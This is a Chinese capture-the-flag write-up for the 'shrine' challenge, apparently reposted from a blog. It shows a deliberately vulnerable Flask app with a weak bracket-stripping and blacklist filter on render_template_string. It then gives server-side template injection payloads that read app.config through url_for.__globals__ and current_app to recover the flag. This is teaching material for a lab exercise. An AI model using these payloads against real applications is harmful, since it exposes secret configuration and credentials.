Web(shrine)
作者:互联网
题目描述如下:
这是一段python代码,直接查看页面源代码。
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/<path:shrine>') //描述路径
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '') //把括号过滤
blacklist = ['config', 'self'] //config和self为黑名单
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)
根据shrine的路径,构建payload:http://111.200.241.244:53756/shrine/%7B%7B2+2%7D%7D即(靶机IP地址/shine/{{2+2}}),确认存在模板注入。
常规的想法, 利用{undefined{config}}查看app.config内容,但源代码中过滤了config。
因此构建其他payload: http://111.200.241.244:53756/shrine/%7B%7Burl_for.__globals__%7D%7D,采用{{url_for.__globals__}}
{{url_for.__globals__['current_app'].config}}
标签:__,Web,globals,app,flask,shrine,config 来源: https://blog.csdn.net/m0_56010012/article/details/123230556